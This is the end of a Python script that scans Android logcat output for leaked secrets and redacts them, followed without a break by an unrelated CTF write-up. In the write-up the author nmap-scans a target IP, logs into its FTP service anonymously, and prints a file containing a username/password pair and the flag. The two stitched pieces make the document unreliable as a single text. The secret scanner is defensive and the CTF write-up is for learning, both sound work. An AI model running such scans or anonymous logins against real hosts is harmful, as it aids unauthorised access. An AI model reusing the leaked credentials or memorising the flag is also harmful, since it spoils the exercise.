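    for n, line in enumerate(text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        for key, value in _SECRET.findall(rec["msg"]):
            findings.append({"line": n, "tag": rec["tag"], "key": key.lower(), "value": value})
    return findings


def redact(text):
    """Mask secret values: the fix to apply inside the app's logging wrapper."""
    return _SECRET.sub(lambda m: m.group(0).replace(m.group(2), "[REDACTED]"), text)


if __name__ == "__main__":
    for f in scan_logcat(SAMPLE_LOG):
        print(f"line {f['line']} [{f['tag']}] {f['key']} = {f['value']}")
    print(redact(SAMPLE_LOG))
```

The same scanner can be pointed at `adb logcat -v threadtime` output during a test run; in production the only correct setting is to strip debug/verbose logging from release builds entirely.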
Description:
John Lee Love is standing up a server to support all of his research on pencil sharpeners. Take a look to see if there are any issues he should address before making it public. Target IP: 191.101.169.9
This was also a machine; the first thing I did was to scan that IP:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/pencil]
└─$ nmap -F 191.101.169.9
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-25 09:09 EDT
Nmap scan report for 191.101.169.9
Host is up (0.22s latency).
Not shown: 95 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
3000/tcp open ppp
Nmap done: 1 IP address (1 host up) scanned in 29.55 seconds
We have 3000, 80 and 21, the most interesting ports of all. Hitting the -A flag in nmap, we get that we can log in anonymously on port 21, so that's what I do now: get access, and there is a file inside it:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/pencil]
└─$ cat trapperkeeper.txt
What's do you call a broken pencil?
brokenpencil P01ntl3ss
TRIBECTF{Ar3ntY0uSh@rp}
FLAG : TRIBECTF{Ar3ntY0uSh@rp}
SADLY WHILE WRITING THIS WRITEUP THEY TURNED OFF THE SERVERS FOR MACHINES AND ALL THAT SO I WILL END HERE:(
This was a really interesting CTF; I took second position as a solo.
Contacts: twitter - @tahaafarooq